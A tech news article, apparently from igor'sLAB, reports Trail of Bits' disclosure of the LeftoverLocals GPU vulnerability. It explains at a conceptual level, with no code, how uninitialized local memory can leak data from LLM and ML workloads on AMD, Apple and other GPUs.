It’s fairly common for vulnerabilities to emerge in hardware components, and it usually affects a large number of people in the technology industry. A recent example is the recently disclosed Intel’s Downfall vulnerability, which compromised thousands of the company’s CPU users. This time, however, GPU users, regardless of platform, be it mobile or desktop, should be wary. Security researcher Trail of Bits has discovered a vulnerability that has the potential to extract “key data” from internal memory.

There is a vulnerability called “LeftoverLocals” that does not target consumer applications, but aims to penetrate GPUs built into large language models (LLMs) and machine learning (ML) models. In this area, it is particularly important to extract data, as training models involves the use of sensitive data. Experts at Carnegie Mellon University are following the development of LeftoverLocals, and it is reported that the information has already been shared by major GPU vendors such as NVIDIA, Apple, AMD, Arm, Intel, Qualcomm and Imagination.
It was found that when running a model with seven billion parameters, LeftoverLocals can leak about 5.5 MB of data per GPU call on AMD’s Radeon RX 7900 XT. According to Trail of Bits, the data leakage rate is sufficient to reconstruct the entire model. Therefore, this vulnerability poses a significant risk in the field of artificial intelligence, especially for companies that focus on training LLMs. Attackers could potentially benefit from advances in AI and thus exert a much greater influence.
LeftoverLocals depends solely on how a GPU isolates its memory, which is completely different from a CPU framework. An attacker who has shared access to a GPU via a programmable interface can therefore steal memory data, which can lead to various security issues. LeftoverLocals is divided into two different processes, a listener and a writer, and both work as follows:
Overall, this vulnerability can be illustrated using two simple programs: a Listener and a Writer, where the writer stores canary values in local memory, while a listener reads uninitialized local memory to check for the canary values. The Listener repeatedly launches a GPU kernel that reads from uninitialized local memory. The Writer repeatedly launches a GPU kernel that writes canary values to local memory.
The average consumer probably doesn’t need to worry about LeftoverLocals. But for professionals in industries such as cloud computing or inference, this vulnerability could be fatal, especially with regard to the security of LLMs and ML frameworks.
Source: Trail of Bits
5 Antworten
Kommentar
Lade neue Kommentare
Veteran
Veteran
Urgestein
Urgestein
Alle Kommentare lesen unter igor´sLAB Community →